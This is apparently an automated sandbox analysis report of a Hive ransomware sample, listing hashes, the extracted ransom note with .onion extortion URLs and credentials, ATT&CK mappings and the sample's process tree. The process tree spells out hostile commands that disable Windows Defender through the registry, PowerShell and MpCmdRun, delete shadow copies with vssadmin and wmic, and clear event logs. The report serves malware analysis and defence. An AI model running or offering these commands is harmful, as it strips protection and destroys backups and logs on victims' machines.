Overview

overview

10

Static

static

3

2025-03-07...ch.exe

windows7-x64

10

2025-03-07...ch.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07/03/2025, 02:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2025-03-07_760ccfdb30fe7eaab9cd4c7450d73c24_frostygoop_hive_sliver_snatch.exe

  • Size

    2.5MB

  • MD5

    760ccfdb30fe7eaab9cd4c7450d73c24

  • SHA1

    5eb8513686554a871a8dea173f0c175eeec74f38

  • SHA256

    2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709

  • SHA512

    25050f6fa163acec8de703210439d004ce1a752dea70ca6c7daea8c5d19c46647f573e1934609e5aeeee787dd6ef180701304f9f695fa30193f2d9704aaaa5c5

  • SSDEEP

    24576:pT6Gyv2Cc+qVzsnjRaPTbGQtIYph4qDqz15QAml7+GgEEtKBM7i4ArwRV6LUEFga:pCXo8m04Td2xDoCLyv1D1

Score
10/10
hivedefense_evasiondiscoveryevasionexecutionimpactransomwarespywarestealertrojan

Malware Config

Extracted

Path

C:\Program Files\UZEP_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note
Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: zo6NZMEhyHgb Password: Ao1KMM8jU6P2DgkuhXqN To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.gtqbv files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.
URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

    defense_evasion
  • Disables service(s) 3 TTPs
    defense_evasionexecution
  • Hive

    A ransomware written in Golang first seen in June 2021.

    ransomwarehive
  • Hive family
    hive
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
    defense_evasiontrojan
  • Modifies security service 2 TTPs 1 IoCs
    defense_evasion
  • Clears Windows event logs 1 TTPs 3 IoCs
    defense_evasionransomware
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Modifies Security services 2 TTPs 6 IoCs

    Modifies the startup behavior of a security service.

    defense_evasion
  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-07_760ccfdb30fe7eaab9cd4c7450d73c24_frostygoop_hive_sliver_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-07_760ccfdb30fe7eaab9cd4c7450d73c24_frostygoop_hive_sliver_snatch.exe"
    1⤵
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2596
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "NetMsmqActivator" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2308
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "NetMsmqActivator" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2924
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "SamSs" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2432
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "SamSs" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1372
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "SDRSVC" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:272
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "SDRSVC" /y
        3⤵
          PID:1540
      • C:\Windows\SysWOW64\net.exe
        net.exe stop "SstpSvc" /y
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1584
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "SstpSvc" /y
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2752
      • C:\Windows\SysWOW64\net.exe
        net.exe stop "UI0Detect" /y
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2216
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "UI0Detect" /y
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2392
      • C:\Windows\SysWOW64\net.exe
        net.exe stop "VSS" /y
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2704
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "VSS" /y
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2760
      • C:\Windows\SysWOW64\net.exe
        net.exe stop "wbengine" /y
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2772
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "wbengine" /y
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2668
      • C:\Windows\SysWOW64\net.exe
        net.exe stop "WebClient" /y
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2624
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "WebClient" /y
          3⤵
            PID:2232
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "NetMsmqActivator" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:2940
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "SamSs" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:2520
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "SDRSVC" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:2792
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "SstpSvc" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:2748
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "UI0Detect" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:2780
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "VSS" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:2628
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "wbengine" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:2524
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "WebClient" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:2580
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
          2⤵
          • Modifies Security services
          • System Location Discovery: System Language Discovery
          PID:3028
        • C:\Windows\SysWOW64\reg.exe
          reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:1272
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
          2⤵
          • Modifies Windows Defender DisableAntiSpyware settings
          • System Location Discovery: System Language Discovery
          PID:1192
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
          2⤵
            PID:1648
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
            2⤵
            • System Location Discovery: System Language Discovery
            PID:1476
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
            2⤵
            • Modifies Windows Defender Real-time Protection settings
            • System Location Discovery: System Language Discovery
            PID:1228
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
            2⤵
            • Modifies Windows Defender Real-time Protection settings
            • System Location Discovery: System Language Discovery
            PID:2604
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
            2⤵
            • Modifies Windows Defender Real-time Protection settings
            • System Location Discovery: System Language Discovery
            PID:1764
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
            2⤵
            • Modifies Windows Defender Real-time Protection settings
            • System Location Discovery: System Language Discovery
            PID:1980
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
            2⤵
            • Modifies Windows Defender Real-time Protection settings
            PID:1736
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
            2⤵
            • System Location Discovery: System Language Discovery
            PID:1988
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2880
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2872
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2836
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
            2⤵
            • System Location Discovery: System Language Discovery
            PID:3020
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
            2⤵
            • System Location Discovery: System Language Discovery
            PID:3048
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2104
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2920
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2200
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
            2⤵
            • System Location Discovery: System Language Discovery
            PID:1060
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2956
          • C:\Windows\SysWOW64\reg.exe
            reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
            2⤵
            • System Location Discovery: System Language Discovery
            PID:572
          • C:\Windows\SysWOW64\reg.exe
            reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
            2⤵
              PID:700
            • C:\Windows\SysWOW64\reg.exe
              reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
              2⤵
              • System Location Discovery: System Language Discovery
              PID:892
            • C:\Windows\SysWOW64\reg.exe
              reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
              2⤵
                PID:1960
              • C:\Windows\SysWOW64\reg.exe
                reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                2⤵
                • System Location Discovery: System Language Discovery
                PID:1668
              • C:\Windows\SysWOW64\reg.exe
                reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                2⤵
                • System Location Discovery: System Language Discovery
                PID:972
              • C:\Windows\SysWOW64\reg.exe
                reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                2⤵
                • Modifies Security services
                • System Location Discovery: System Language Discovery
                PID:1160
              • C:\Windows\SysWOW64\reg.exe
                reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                2⤵
                • Modifies Security services
                • System Location Discovery: System Language Discovery
                PID:2900
              • C:\Windows\SysWOW64\reg.exe
                reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                2⤵
                • Modifies Security services
                • System Location Discovery: System Language Discovery
                PID:1608
              • C:\Windows\SysWOW64\reg.exe
                reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                2⤵
                • Modifies Security services
                • System Location Discovery: System Language Discovery
                PID:1636
              • C:\Windows\SysWOW64\reg.exe
                reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                2⤵
                • Modifies security service
                PID:2136
              • C:\Windows\SysWOW64\reg.exe
                reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                2⤵
                • Modifies Security services
                • System Location Discovery: System Language Discovery
                PID:772
              • C:\Windows\SysWOW64\vssadmin.exe
                vssadmin.exe delete shadows /all /quiet
                2⤵
                • System Location Discovery: System Language Discovery
                • Interacts with shadow copies
                PID:924
              • C:\Windows\SysWOW64\wevtutil.exe
                wevtutil.exe cl system
                2⤵
                • Clears Windows event logs
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:768
              • C:\Windows\SysWOW64\wevtutil.exe
                wevtutil.exe cl security
                2⤵
                • Clears Windows event logs
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:1468
              • C:\Windows\SysWOW64\wevtutil.exe
                wevtutil.exe cl application
                2⤵
                • Clears Windows event logs
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:1924
              • C:\Windows\SysWOW64\Wbem\wmic.exe
                wmic.exe SHADOWCOPY /nointeractive
                2⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:2440
              • C:\Windows\SysWOW64\Wbem\wmic.exe
                wmic.exe shadowcopy delete
                2⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:1256
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                2⤵
                • System Location Discovery: System Language Discovery
                PID:1524
                • C:\Program Files\Windows Defender\MpCmdRun.exe
                  "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                  3⤵
                  • Deletes Windows Defender Definitions
                  PID:2428
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
                2⤵
                • System Location Discovery: System Language Discovery
                PID:344
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell Set-MpPreference -DisableIOAVProtection $true
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2924
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
                2⤵
                • System Location Discovery: System Language Discovery
                PID:1940
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell Set-MpPreference -DisableRealtimeMonitoring $true
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2644
              • C:\Windows\SysWOW64\notepad.exe
                notepad.exe C:\UZEP_HOW_TO_DECRYPT.txt
                2⤵
                • System Location Discovery: System Language Discovery
                • Opens file in notepad (likely ransom note)
                PID:2296
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\2025-03-07_760ccfdb30fe7eaab9cd4c7450d73c24_frostygoop_hive_sliver_snatch.exe"
                2⤵
                • Deletes itself
                • System Location Discovery: System Language Discovery
                • System Network Configuration Discovery: Internet Connection Discovery
                PID:2280
                • C:\Windows\SysWOW64\PING.EXE
                  ping.exe -n 5 127.0.0.1
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • System Network Configuration Discovery: Internet Connection Discovery
                  • Runs ping.exe
                  PID:2668

            Network

            MITRE ATT&CK Enterprise v15

            Reconnaissance

            Resource Development

            Initial Access

            Execution

            Command and Scripting Interpreter

            2
            T1059

            PowerShell

            1
            T1059.001

            System Services

            1
            T1569

            Service Execution

            1
            T1569.002

            Windows Management Instrumentation

            1
            T1047

            Persistence

            Create or Modify System Process

            4
            T1543

            Windows Service

            4
            T1543.003

            Privilege Escalation

            Create or Modify System Process

            4
            T1543

            Windows Service

            4
            T1543.003

            Defense Evasion

            Direct Volume Access

            1
            T1006

            Impair Defenses

            4
            T1562

            Disable or Modify Tools

            2
            T1562.001

            Indicator Removal

            3
            T1070

            Clear Windows Event Logs

            1
            T1070.001

            File Deletion

            2
            T1070.004

            Modify Registry

            4
            T1112

            Credential Access

            Credentials from Password Stores

            1
            T1555

            Credentials from Web Browsers

            1
            T1555.003

            Unsecured Credentials

            1
            T1552

            Credentials In Files

            1
            T1552.001

            Discovery

            Remote System Discovery

            1
            T1018

            System Location Discovery

            1
            T1614

            System Language Discovery

            1
            T1614.001

            System Network Configuration Discovery

            1
            T1016

            Internet Connection Discovery

            1
            T1016.001

            Lateral Movement

            Collection

            Data from Local System

            1
            T1005

            Command and Control

            Exfiltration

            Impact

            Inhibit System Recovery

            2
            T1490

            Service Stop

            1
            T1489

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Program Files\UZEP_HOW_TO_DECRYPT.txt
              Filesize

              1KB

              MD5

              c4bfe3cc5113f57dc2e5b89c7374e048

              SHA1

              3a43c21e9401fb7d6d9cd3941aa853eb407b0b6b

              SHA256

              4dedc0a2be54c954d754e5e597b72bb54fdd706a0039b01b0ff9107fe4c10acb

              SHA512

              e8dbc2b6f7142cf9ba075861026edf795ea5f6bd852e286fce821ada6f2caf4dc7ba7ecafe44a1b0dc937ab7dc67d8ea787d6518c9ee67db8b88b1557ff847c3

              Download Submit

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              Filesize

              7KB

              MD5

              b9f2a1317bb6732af317574a8225e661

              SHA1

              25992cf752090d2c0e48805eb6ad3d631fa519b6

              SHA256

              fa1fd7861b5b377aa39ea17eedc16e283faf0fb1e7813061375ae5060da9e31e

              SHA512

              39db94be920346794ae57d2082767f29d306bf2596d6e5f8b1feab7b6a39a10786ae2e31eb7dd20045f4b21cfd1578428edd0158e5716e8a21173aac44d2bed1

              Download Submit